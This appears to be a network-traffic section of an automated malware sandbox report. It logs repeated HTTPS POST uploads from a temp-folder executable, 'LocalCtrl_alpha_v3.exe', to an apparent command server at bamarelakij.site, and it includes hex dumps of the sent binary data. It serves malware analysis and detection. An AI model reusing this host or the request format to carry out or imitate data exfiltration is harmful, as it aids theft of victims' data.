                                                                                                                                                                  2025-01-06 22:18:29 UTC7558OUTData Raw: 43 6b b9 6e 3f 46 03 1b 2f 6d 8f b5 3d 58 67 aa 8b 1e a8 a5 9f 69 b7 f4 2a 1f 90 c4 23 81 e0 2b f4 70 d8 d9 25 40 f8 62 1c 5b fb e1 e4 67 e8 01 af 08 77 b6 eb 34 e8 82 88 be cd ca 7e f2 6f b4 fc e3 bb 7d 49 7e c9 b9 a8 76 83 34 60 db 33 69 6f c5 f3 68 e9 e9 63 42 9f 82 9d 1c 76 43 63 3b 11 a7 44 4b d1 10 37 c8 b5 df d3 a4 47 54 5c b0 a5 fc 58 e4 8a d7 c9 6f fa a9 1a 48 b5 9c dd 5e b6 fb 6f 28 b8 9e c3 96 65 91 34 68 68 8c 86 6e 7c 6b fb 26 38 10 20 e5 9a 55 cc 92 88 3f 20 61 59 3e 65 1c ba 4c bd a5 bf b2 3b 41 65 56 96 30 ab 3e 5f 75 75 30 ce 78 dd 6d bb 22 88 5b 7a 80 e4 1b 06 5b a8 5a d6 fa eb 47 3a 46 be ca 85 7a 8b 89 9e 1e ef c9 bd 3a 6f bf 35 c6 15 25 e5 d0 65 e7 0d e6 cc ef d8 ce d3 2f 64 2c 04 38 bb e9 88 5e ae b9 51 4c be 4b 5e 4d 4a df 6a 9e a6
                                                                                                                                                                  Data Ascii: Ckn?F/m=Xgi*#+p%@b[gw4~o}I~v4`3iohcBvCc;DK7GT\XoH^o(e4hhn|k&8 U? aY>eL;AeV0>_uu0xm"[z[ZG:Fz:o5%e/d,8^QLK^MJj
                                                                                                                                                                  2025-01-06 22:18:30 UTC832INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:30 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2BXXiF5WiJLBfro2TUK5uNRyVAORujuhhAzXcMg68UmIoLdKPy93Il2jpOAmM%2BD4V3Y3Qinzjs%2F8UabHjSxRx0s6IIAuzJ5mVKuv%2BVIRSHX5X9c5XlAi5Z%2FFrJ8AoNmB0ueM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf158e894f4400-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10615&min_rtt=1824&rtt_var=6064&sent=27&recv=75&lost=0&retrans=0&sent_bytes=2839&recv_bytes=70150&delivery_rate=1600877&cwnd=156&unsent_bytes=0&cid=ce0f97c820c2e73a&ts=587&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  23192.168.2.450117104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:30 UTC453OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 35
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:30 UTC35OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  2025-01-06 22:18:31 UTC726INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:30 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xF%2Ff9jlRVOEhdAXnTt68%2Ff5ZWC5e1JZrMegSaQwhwzk7YYUa29lDU3g3QNuMFaHvPcsbrtYdrFPJYGltvSIlGgwV1wkcGfiEQPv%2B4jUQys1rrlVwUyl550qPNLy5R1J7dwwr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15961ec14346-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2055&rtt_var=799&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1124&delivery_rate=1346242&cwnd=252&unsent_bytes=0&cid=3cb1a675aae2c511&ts=312&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  24192.168.2.450118104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:42 UTC457OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 109611
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 a0 55 01 00 08 00 00 00 52 00 00 00 fd 04 e9 09 95 a7 40 16 d7 35 c9 59 83 81 00 00 00 00 00 00 00 00 00 00 fe 02 f4 84 c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 1a a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 1e a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 b3 b4 37 10 22 b0 3a b0
                                                                                                                                                                  Data Ascii: UR@5Y`HIL`HS49.9.57.88":.&6.6.49.9":`H"36:.9.57.88":.&6.6.49.9":."36:49199.49.8936."36:.&7":
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: bb 8b 72 6e 84 1b 8b 11 8a b9 71 cf db b0 c3 92 36 80 cd 7e 73 13 42 02 b5 5e aa d9 57 14 89 f5 c2 74 bd f3 1a fe a1 f5 d8 e7 6d 05 7b 12 27 1f de 5d 60 66 2d 42 f5 40 44 aa 2b f1 83 6b 82 be 02 fb 12 0e 0a b0 ae 1a 02 c9 7d eb bb 24 5f 21 36 1e 3d 95 74 6c 23 93 dc 4b ae ac 63 d8 2e 42 28 ec 3d 29 0b 22 4b 68 0d b0 34 65 2d 41 25 5e 58 a6 79 d6 ae 2b f5 0a ee 6f 1d 9a 1f 18 a6 ab ab 1b e1 92 62 7b 59 dd e9 5a 00 45 ff 88 6b 83 50 79 f7 cb 52 ec 46 0f 0c 1f c5 3a 05 90 28 6d 35 72 59 cc e6 c8 42 59 af 0f 23 1e 4b 31 a9 f4 05 bd 1e 31 d9 f5 0d 34 57 2f 63 7a c1 3d 25 09 b9 1e 68 e1 84 85 be a1 c7 96 07 27 7e d6 ce 84 af ae a8 f2 26 3c ba 5f a1 e4 78 f9 84 24 6e ee 9f 2c 3f f9 6d 56 47 2b ce b0 d3 83 28 24 6f 40 82 42 35 0e 8e 47 96 e1 2b c2 26 8d bc cb 7b
                                                                                                                                                                  Data Ascii: rnq6~sB^Wtm{']`f-B@D+k}$_!6=tl#Kc.B(=)"Kh4e-A%^Xy+ob{YZEkPyRF:(m5rYBY#K114W/cz=%h'~&<_x$n,?mVG+($o@B5G+&{
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: dd a7 31 e8 7b 0c ef aa e7 48 b3 2e 34 87 4b 09 9f 4e b5 cc e1 e0 56 ea c8 f8 3e 19 c3 2c 9e 6d 62 55 a7 92 bc 22 92 7a 26 07 6b 56 ee ee 8c 52 a7 4e f7 1f 20 30 16 4c c3 95 72 68 fe c4 ac 50 e3 c7 d2 7b 2b aa 64 f2 25 00 11 e0 d7 46 92 c5 6d 54 8f 0e f4 54 da 53 36 af 94 2b a9 bf 63 7f 35 1f 1f e0 d8 33 bd e5 95 4e 2d 94 40 f6 35 00 b5 bf a5 de 93 03 1f 8a 5d e9 ca da 53 ca f7 3d 70 13 5c d5 a5 54 6e ba e9 b8 97 2a e1 35 64 1c a0 27 21 9c f5 c1 79 c0 83 94 66 e7 95 16 a5 d2 a0 96 ab d3 f9 24 52 9b 09 21 03 4a 27 e9 2c 3e 9d 7d 98 1e 93 93 77 b1 90 f8 51 9e 31 89 5f b5 74 bc 47 9f 43 bb 99 03 ee 68 f7 dc 7a ba a7 68 5b 3c 72 86 69 61 e3 1a 75 8e 49 63 e5 40 27 c4 fc f2 53 c3 27 f4 dc 2b de 20 1a bb c0 59 de 24 1e bb 1d d2 80 f3 20 14 05 ab 9e ed d6 f7 26
                                                                                                                                                                  Data Ascii: 1{H.4KNV>,mbU"z&kVRN 0LrhP{+d%FmTTS6+c53N-@5]S=p\Tn*5d'!yf$R!J',>}wQ1_tGChzh[<riauIc@'S'+ Y$ &
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: 8d 88 3e 22 e8 64 ae 86 2f c3 5f 4d 53 a8 0b f5 ce c1 da d4 2f 2e 1c bd 2f 76 d8 07 75 c1 0a ac 12 54 84 d6 61 b3 77 0b 57 32 db ef 2f 3b 25 58 d6 b6 63 d1 c3 cd 2d 8e c9 ea b1 c8 e8 28 52 90 f2 83 08 48 86 54 3c 24 9f 15 76 b3 9d 93 06 07 9a e6 c8 98 30 f8 48 3f 6c 0a 91 e7 ea d7 61 8a e9 80 38 38 55 b0 4f 46 80 47 87 76 d1 3d 1a 57 24 0d 07 18 52 45 7a 13 d8 29 57 19 62 9b 2e 1d a9 65 50 f8 3c 5c 13 9e 87 b8 49 6a 47 0b 42 4b fd 26 81 11 1b da 21 8f 87 b1 7c 65 e8 e1 93 ab e6 e4 da db 21 6a cd 1c 3e f8 cb 61 fe ff 77 64 c6 82 1d 92 74 c6 bc 11 e8 cd 61 0c 77 b9 3a 58 6c eb 39 de 8c 56 f0 3f 93 87 e5 3e 9a df 4b 7f 06 d0 9b 6b 44 42 8f 45 be dc e7 14 10 31 ae 95 7a f0 18 43 8b 0c 9e 1e 7b ea 1e ed 3d a5 42 ef c4 e1 38 bf e4 f9 82 1d 96 74 c6 b2 11 e8 dd
                                                                                                                                                                  Data Ascii: >"d/_MS/./vuTawW2/;%Xc-(RHT<$v0H?la88UOFGv=W$REz)Wb.eP<\IjGBK&!|e!j>awdtaw:Xl9V?>KkDBE1zC{=B8t
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: a4 0e 8b 39 5d 92 3a 27 fd ca cd 6a 1e 4e 1f 08 41 17 e5 f4 56 43 78 a5 5d ee b8 d1 6d 99 ed d0 86 3b 38 cd 8c 4f 24 14 06 c7 85 63 8f 18 a0 89 b6 b1 3c 4e 89 a3 1f 60 96 59 e1 d6 64 db 5c a2 2b 96 16 22 f7 75 4e 74 86 df 68 d5 6c 34 c9 b6 35 c9 b6 5b 27 fb 7d de 8f 3d 99 49 05 a0 cc d9 e6 3b a4 12 06 ed e7 f7 0b c3 61 b5 f6 49 27 df 89 37 1f 2c dd a5 1d c8 8f a7 98 5d b5 c7 ef c4 db 6b 67 73 7d f0 c2 1f ff de a9 8c 18 84 6a d3 18 6e 93 c6 5b bd 4d 02 a7 b1 e9 9f 61 6f bc 49 74 34 5f 33 d2 d9 33 f1 4b b7 8f 26 21 62 98 4c a4 26 ee 8f 70 8c f9 e6 b0 e2 bf 6b 9e 37 92 96 3b 1b eb 87 95 51 a0 82 9b 49 45 10 d9 f1 d8 2a 84 a3 da 5f a7 a6 ec 27 2d 37 0e f5 1f d0 53 36 e3 26 ed 42 5b 6d a8 8f a7 6c 3f 72 f5 07 95 17 b3 03 88 11 16 de 37 29 cd 1c 41 19 a3 7a 6f
                                                                                                                                                                  Data Ascii: 9]:'jNAVCx]m;8O$c<N`Yd\+"uNthl45['}=I;aI'7,]kgs}jn[MaoIt4_33K&!bL&pk7;QIE*_'-7S6&B[ml?r7)Azo
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: 8d 73 dc b9 d2 a7 3c 7e 4a 35 7c 4d 8c a4 33 7d 8c 6b 1f f2 66 3e 38 f6 b9 fe 1c 48 ed f4 93 fe fa 10 76 9f cf 72 a7 4d f4 a3 6d c4 7c f9 93 e6 6a a1 f6 2a e9 18 bf 9d fa c3 52 f0 93 e2 ce b3 70 21 d4 48 b3 73 90 3e d2 b2 74 b8 af f3 7e 9e 30 a3 24 8e 19 9b 77 ba 6e cb c0 f5 23 6f 25 93 f1 ce 3e 2a 65 52 a1 cc 26 ff de e3 35 65 60 84 b6 a6 8e 57 36 94 4d 2d 02 de 93 75 d4 19 53 4f bd f3 ae ad db 4d 8c cb 57 09 19 7f f7 89 b1 07 00 78 d9 66 e2 8b 65 73 f6 89 bc e7 fd c9 e9 18 ce a7 0f be 84 ff 7f 87 00 00 00 14 0f 3c 7f 87 00 00 00 0a c7 25 5a ff e7 d3 62 7c 1a c8 04 00 00 00 40 97 10 f2 7b ef fc cd b2 19 9a 9a 9a c2 fd bf 00 00 00 50 3c 30 fe 83 00 00 00 45 83 6b bf 00 00 00 50 3c 30 fe 83 00 00 00 45 83 6b bf 00 00 00 50 3c 30 fe 83 00 00 00 45 83 6b bf
                                                                                                                                                                  Data Ascii: s<~J5|M3}kf>8HvrMm|j*Rp!Hs>t~0$wn#o%>*eR&5e`W6M-uSOMWxfes<%Zb|@{P<0EkP<0EkP<0Ek
                                                                                                                                                                  2025-01-06 22:18:42 UTC15331OUTData Raw: 96 34 7f 64 e1 a3 34 e9 fc 7b d0 b8 81 1a 53 da 3b b1 07 6e 5d 6e 1c e4 da 90 69 3d 7d dc a3 73 b5 23 1f 8c ab b4 48 0c eb 3f c4 62 16 59 64 b0 e2 ed 03 cb 46 51 b1 a2 ec f7 1d 93 47 1e 96 65 cd df 33 f8 16 ff 8c be 7b 37 24 79 74 b5 98 6d 90 da 25 10 76 3e b8 a5 90 fb e2 73 d8 91 25 ee c3 ae da ae 2a 1f cf cf 19 be 7d b1 0f b3 41 a4 ff 49 b2 85 87 7f 50 d5 78 3f a9 fa 53 b8 65 5b 95 b1 69 52 01 e1 dd 27 5d f5 17 0f 76 bb 5b e6 42 99 9d 57 c3 df 85 2a fc fb db cf 3f ba ad 67 68 92 e2 d5 6d 4f d6 7d f6 71 c5 c4 1b c2 a1 85 23 02 b2 62 17 0e c8 2f 2f ca 4c ea 90 e7 b1 1f e3 96 d4 f9 aa 83 a0 6f 61 dd 93 81 46 7d ef 1f 1e 64 94 46 df f3 fc 4c 1a f1 4e cc 17 62 2e db b8 77 ed ab 95 27 f2 b7 5b e8 fb 3f 4f bb ff 17 df 58 ce 59 40 37 ed 38 76 e2 ad c9 72 79 ba
                                                                                                                                                                  Data Ascii: 4d4{S;n]ni=}s#H?bYdFQGe3{7$ytm%v>s%*}AIPx?Se[iR']v[BW*?ghmO}q#b//LoaF}dFLNb.w'[?OXY@78vry
                                                                                                                                                                  2025-01-06 22:18:42 UTC2294OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  2025-01-06 22:18:43 UTC731INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:43 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9s1WM4cRyvhpBVcmEKuh9RNfj60toEm3uHkR02QQPfRZV3FDQSuQOktP%2BfzzFDxaI5At1dRDXl62ahi6PVKQXMsL1wb50GxfAqdaHlj0TWqSh8yp0fNYEF%2FyqaHIBdvri4xF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15e2aa9042b7-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=16396&min_rtt=1617&rtt_var=9492&sent=54&recv=118&lost=0&retrans=0&sent_bytes=2838&recv_bytes=111012&delivery_rate=1805813&cwnd=212&unsent_bytes=0&cid=f1b49b8a50c84ee4&ts=539&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  25192.168.2.450119104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:44 UTC454OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 745
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:44 UTC745OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 8c 8e 68 35 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 46 47 34 9a 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff a7 00 00 00 08 00 00 00 52 00 00 00 b6 ea 41 13 95 a7 40 16 d7 35 c9 59 8a 00 00 00 00 00 00 00 00 00 00 00 5b 75 a0 89 49 60 49 ca 60 01 80 d1 49 60 00 50 ca 60 80 80 d1 49 60 00 50 31 00
                                                                                                                                                                  Data Ascii: Rh5@5YFG4I`H1FG4(((RA@5Y[uI`I`I`P`I`P1
                                                                                                                                                                  2025-01-06 22:18:44 UTC724INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:44 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=czuL73uj4P4urdSAKEGn5Jvr8dtD7ZiS86xLknCJtXYhKCG7ImVQ2SEyTdnVw%2FYZukHg9n3HwYp2mEzF2WvhNR1xfNWGmLxOCyTLIX7Cs3dbSjNmxnLTeuyiI3cOai8UW%2B3I"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15eacc981a0f-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1837&min_rtt=1827&rtt_var=706&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1835&delivery_rate=1527995&cwnd=224&unsent_bytes=0&cid=60d14e74eae75c38&ts=331&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  26192.168.2.450120104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:45 UTC454OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 212
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:45 UTC212OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 99 00 00 00 08 00 00 00 52 00 00 00 6f d2 a9 18 95 a7 40 16 d7 35 c9 59 83 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c c9 60 60 49 60 c8 00 31 00 00 00 00 00 00 00 00 00 00 00 b7 69 d4 0c 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii: Ro@5Yi``I`1i(((
                                                                                                                                                                  2025-01-06 22:18:45 UTC729INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:45 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsxCFDga5RY2Sk%2FYInr8N5BZckagdLnTdAlsazasINGcomDpjberheS7kkrAq5YEi8sLE8fEd%2BPB552%2FeLAmBSefGY%2BhC4waXNuP%2BuKuBVBYCHb4faTOEjJFLGVx7mHcGHPh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15f14bd64204-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4228&min_rtt=4228&rtt_var=2114&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4216&recv_bytes=1302&delivery_rate=48114&cwnd=234&unsent_bytes=0&cid=7cf51d3f4a38675c&ts=359&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  27192.168.2.450121104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:46 UTC454OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 380
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:46 UTC380OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 f5 31 4e 30 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 fa 98 27 18 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 94 00 00 00 08 00 00 00 52 00 00 00 8e 36 1e 13 95 a7 40 16 d7 35 c9 59 01 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 c8 48 31 00 00 00 00 00 00 00 00 00 00 00 47 1b 0f 89 28 a5 03 03 16
                                                                                                                                                                  Data Ascii: R1N0@5Y'I`H1'(((R6@5YGH1G(
                                                                                                                                                                  2025-01-06 22:18:46 UTC728INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:46 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sslQw5len5olwlvBjtA8CjjEfQ68yl0KZGygtvDnlrlyvLyh5RfxOS5KejzEK0%2BWZ3m3NF7s7YuvVmL2WJPEnc%2F5PONB91iRIuAnjhPPCGpf%2FAuIxtSGc6Yfq5C9Zyo3bX%2F5"}],"group":"cf-nel","max_age":604800}
